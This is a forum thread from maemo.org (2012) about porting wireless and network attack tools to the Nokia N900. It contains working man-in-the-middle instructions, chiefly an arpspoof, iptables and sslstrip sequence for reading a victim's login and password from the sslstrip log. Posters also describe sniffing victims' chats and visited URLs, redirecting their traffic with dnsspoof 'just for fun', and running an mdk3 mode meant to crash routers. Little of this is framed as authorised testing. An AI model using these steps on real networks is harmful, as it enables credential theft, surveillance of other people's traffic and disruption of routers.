maemo.org - Talk

maemo.org - Talk (https://talk.maemo.org/index.php)
-   Applications (https://talk.maemo.org/forumdisplay.php?f=41)
-   -   [Tutorial] Pentesting Wireless Networks (https://talk.maemo.org/showthread.php?t=73572)

davdav 2012-01-24 17:52

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
i tried using aircrack and it worked .. so i am asking what is the diffrence between this and aircrack ?
thanks in advance :)

karam 2012-01-24 17:52

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
don't forget to :

Code:

sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward

or else everything is useless




@davdav

this is completely something different from aircrack
it's MITM same as ettercap but ultra faster

stevomanu 2012-01-24 17:52

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
A quick test and all seems ok with the build .....


Code:

/arpspoof -i wlan0 -t 192.168.1.3 192.168.1.5
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
^O2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2

cheers

karam 2012-01-24 17:56

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
cool

now i will go for charon and destruction mode

ULTRA DANGEROUS

but i will work on it tomorrow ;)


arpspoof should be soon the new depend of yamas script :)

davdav 2012-01-24 18:20

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
and what does that do ?

stevomanu 2012-01-24 18:27

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
Its the same as ettercap but much better and faster
heres a link have a read see what you think ...

http://en.wikipedia.org/wiki/ARP_spoofing

Another good page

q6600 2012-01-25 11:56

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
1 Attachment(s)
I try arpspoof and is starting.

Thank you
karam and stevomanu

qwertqwert 2012-01-25 12:04

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
https://github.com/pwnieexpress/Source-Repository

trisha02 2012-01-25 14:18

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
@ karam-- i did apt-get install yamas. then run the icon from the menu. then did as it said in the youtube video of yamas. then i could do it. passwords and login information and website also appeared. can you post a video of each of your hacking tutorials. arp spoofing coz its very hard for a noob to understand what you guys tok abt and also the wiki since i dnt hav any knowledge about linux. but i would love to test al this hacking materials. so please can you give a tutorial with a video or anythng. just for us (noobs). it would be helpful. i kno you are very busy with all your works. so i gues if u could appoint and of the gurus from the thread to just post tutorials. please karam.

karam 2012-01-26 17:20

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
omg omg omg omg

i'm so shy from u guys
can some one upload karam.tar.gz to some where ??
i can't download it from mega nor any site uploaded to !!

i need it for packaging libs from it to run arpspoof in repos !

stevomanu 2012-01-26 17:24

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
http://dl.dropbox.com/u/44965378/N900%20mods/karam.zip

sorry for the wait ... add link to first page if you like ..


Quote:

Originally Posted by karam (Post 1156134)
omg omg omg omg

i'm so shy from u guys
can some one upload karam.tar.gz to some where ??
i can't download it from mega nor any site uploaded to !!

i need it for packaging libs from it to run arpspoof in repos !


-Tyler- 2012-01-26 19:57

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
TO KARAM:

i have talked with other people who has the N900 and MITM attacks no longer wornking in the N900, when you run ettercap or any other program who needs promiscuous mode, the conection get stuck and you can't sniff any packet or navigate with the N900. I have trying to reflash and nothing work, I use:

kernel power 49 with CSSU testing

but i have trying with kernel power 46, 47, 48 and nothing there is some packet or dependency or something thas has screw up the whole promiscuous mode in the N900.

Do you have the same problem??

- Good news!! Recently the projetc ettercap has been reborn after 8 years of no actualization with a new version, ettercap 0.74 lazarus, it is a shame we don have this newer version compile for the N900, i have tried the new version in my desktop pc and runs great.

- I have a question for you, are you developing for the N9 ?? because we still doesn't have in the N9 nothing of pentesting material, no ettercap, no wireshark, no nmap, no arpspoof, no aircrack, no metasploit nothing. I will be great have someone of your expertice and knowledge developing for N9, because with 1 GB of RAM it will be the perfect pentesting mobile machine.

Karam thanks for the great work you are for sure one of the biggest experts in the community.

karam 2012-01-26 21:05

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
it's actually true that ettercap makes the connection horrible when using it on N900

that's why i have just finished uploading arpspoof (as package name dsniff)
which is already confirmed to not slowing down the connection as ettercap does especially when running heavy sniffs such as sslstrip and YAMAS script (Based on sslstrip)

soon this problem will be solved for N900 as arpspoof will be the dependency of yamas

and for N9
unfortunately i don't have one

so till i get one (maybe will never)
then i will port hacking tools to it

PS: ettercap re alive is awesome
will contact the author of the ettercap package to port it to N900 (it's very easy to do)

karam 2012-01-29 17:14

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

Code:

sudo gainroot
Code:

apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber

then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username

Mohammed Muid 2012-01-29 17:36

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
@ karam- so arpspoof will just make yamas faster right? karam is it possible to control the hosts? which website they are visiting. redirecting them to something differnt.just for fun.cz i tested it with my pc. it just gives the login info and website. cant do anythng abt it? jst hav to watch it??

and last but not the least- i just love your work man. the speed and battery patches and now this. just proud to be amember of this community. thanks man

karam 2012-01-29 19:13

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
yes that's true
and another yes
it's possible

with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too ;)

PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm

ex : msgsnarf will allow you to sniff chat froma victim
and urlsnarf will get you the urls of the victim
and so on

and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat

q6600 2012-01-29 22:38

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 333
arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1
sslstrip -l 333

No luck...
I can not open no pages ( chrome, firefox) no internet ...

ps
try as well 8080 still no luck

Mohammed Muid 2012-01-30 01:18

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
Quote:

Originally Posted by karam (Post 1157497)
yes that's true
and another yes
it's possible

with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too ;)

PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm

ex : msgsnarf will allow you to sniff chat froma victim
and urlsnarf will get you the urls of the victim
and so on

and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat

ok. that would be just great. so i hav to wait for like 4 months to get a tutorial for dsniff? anyone around who can help me a bit to do all that karam has mentioned? thanks. and best of luck karam

Seker_94 2012-01-30 12:10

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
it worked with me
is arpspoof -i wlan0 -t router targer ? or only target router?
q6600 maybe your computer is using a proxy

-Tyler- 2012-02-01 14:08

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
Quote:

Originally Posted by karam (Post 1157448)
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

Code:

sudo gainroot
Code:

apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber

then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username

i have tested it with arpspoof and it works perfect!! but it work perfect with sslstrip v0.7!!! with sslstrip v0.9 the connection get stuck the majority of times.

How is it going the ettercap 0.74 thing?? you already contact with the maintainer of the packet?? maybe with the new version of ettercap the connection dont get stuck, because altough arpspoof do the job well, ettercap with all is plugins and filters gives a more complete MITM experience :D

I would love to know how to compile pentesting programs to be able to port it to N900 and N9. some tutorial, book o guide you recommend me?? i really admire your contribution to this community.

comaX 2012-02-05 16:26

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
Hi everyone ! Regarding yamas, please post in the appropriate thread so we can easily follow ;)
http://talk.maemo.org/showthread.php...as#post1156260

Btw, the new version with arpspoof is almost out ;) Unhuman could test it this morning.

Oh, and it seems Karam is the one who ported arpspoof to maemo right ? Good job man ;)

karam 2012-02-08 13:17

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
@ All
sorry for taking so long to reply
i'm so busy for about 3 months

@-Tyler-
i haven't yet
but i will now

and i think if you try the already compiled binaries the same ones of N900's
it should work unless it has some library required
so simply place the required ones


@comaX
:) already posted at yamas thread about driftnet and dnsspoof and urlsnarf
check it ;)

karam 2012-02-13 15:25

Re: [How To] Install Hacking Tools On N900
 
great news everyone
i have just finished building and uploading the following packages :

mdk3
charon (mdk3 gui)
driftnet
cowpatty

i have also updated dsniff to include dnsspoof.hosts file (was missing from the initial release)

enjoy everyone ;)

left to do : hamster, airdrop-ng

stevomanu 2012-02-13 16:04

Re: [How To] Install Hacking Tools On N900
 
Are thats a shame my nokia is getting fixed i hope , the usb post came out which im very gutted about back on my n97 for now how crap is that ...

great work thou as always

awett 2012-02-13 17:27

Re: [How To] Install Hacking Tools On N900
 
icedtea is installed from the repo but i get


Nokia-N900:~# apt-get install -f charon
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
charon: Depends: Icedtea6 but it is not installable
E: Broken packages
Nokia-N900:~#

karam 2012-02-13 21:21

Re: [How To] Install Hacking Tools On N900
 
omg what a typo

it should be small i instead of big I

this is the silliest typo i have ever mistaken with
i will fix this now
thank you for reporting this

//EDIT:
uploaded a fixed version of charon

q6600 2012-02-13 22:32

Re: [How To] Install Hacking Tools On N900
 
Hi Karam
I have the same error, i will later to install charon.

awett 2012-02-13 23:55

Re: [How To] Install Hacking Tools On N900
 
charon runs fine but it is in french any chance to change it ?
:-)

q6600 2012-02-14 10:34

Re: [How To] Install Hacking Tools On N900
 
Now is working.
Same request like awett, plus the gui is so small i can not see much.
best regards

Netweaver 2012-02-14 11:34

Re: [How To] Install Hacking Tools On N900
 
it seems there is another a typo in the latest set of 'security' tools in the repo: now in the binary "/opt/driftnet/drifnet". No 't' in the executable name :)

btw, should that one work fine ? I ran "/opt/driftnet/drifnet -v -i wlan0" but it seems it's only seeing the local traffic, not switching into promiscuous mode.
Does one first need to do the iwconfig first to switch it to monitor mode? I though that was done in the driftnet program itself?

PS. this is on my own network, I have the WPA2 key, I just wanna see how good it works:) The phone is runing power49.

Running Charon is not always easy either, as it's crashing often.

Thanks anyway for the effort.

karam 2012-02-14 11:37

Re: [How To] Install Hacking Tools On N900
 
there must be a way to change it to english
however i can't do this my self as i have 0 expert with java things
wish someone can do that instead of me

and @q6600
so small ?
it has every kind of usage of mdk3
the point of it is to run many attacks together
like the destruction mode
it leads to a crash of a router


@Netweaver
oops didn't see your post
anyway
you must run arpspoof before using driftnet to see others traffic

and charon crashes are caused by icedtea6 as it's unstable

q6600 2012-02-14 16:25

Re: [How To] Install Hacking Tools On N900
 
@Karam
you miss understood me, i was referring to the fonts on the gui i can not see much.

karam 2012-02-14 16:40

Re: [How To] Install Hacking Tools On N900
 
again
i say it is icedtea6 problem

i run charon using j2me from easy debian
it has full font and no crashes

gorgezilla 2012-02-14 18:28

Re: [How To] Install Hacking Tools On N900
 
hmmm...

when i try to run charon from xterm it asks for a password....any hints?

karam 2012-02-14 20:21

Re: [How To] Install Hacking Tools On N900
 
you are running it as root :)

run it as user because the launching script has : sudo

gorgezilla 2012-02-14 21:04

Re: [How To] Install Hacking Tools On N900
 
Karam,
Nope, I am not running it as root and keeps asking for password.
any other hints?

psychologe 2012-02-15 11:28

Re: [How To] Install Hacking Tools On N900
 
karam,thank you port these great hack tool to N900,
very like.

if you have free time, can you port THC-hydra7.2 to N900,
i think it will welcome
http://www.thc.org/thc-hydra/

have other question,i installed metasploit on N900,
but how let in support db command,
i try execute :gem1.8 install mysql , but failed

karam 2012-02-15 11:39

Re: [How To] Install Hacking Tools On N900
 
hydra is already ported
check the first post attachements

and about db support
you will need to have gcc and other tools to compile

not sure : but there is an app called tinygcc or somthing (development section)

however i don't recommend using this on N900
i have tried it once
veeeeeeeery slow
plus if any crash happened
the whole of /home partition is corrupted
it will lead to a reflash

@gorgezilla

as root :

java -jar /opt/charon2.0.1-karam/CHARON_2.0.1.jar

as user :

/usr/bin/charon

the shortcut works fine right ?

psychologe 2012-02-15 12:05

Re: [How To] Install Hacking Tools On N900
 
kararm, i know ,but the latest hydra version is 7.2,
fix a lot bug , speen-up,add some services to support.
thanks ,i will install gcc to try it ,
thank your hard work.

taqisyed 2012-02-25 10:57

Re: [How To] Install Hacking Tools On N900
 
why do i get 'permission denied' when i run mdk3 or charon even when i'm root.


All times are GMT. The time now is 20:06.

vBulletin® Version 3.8.8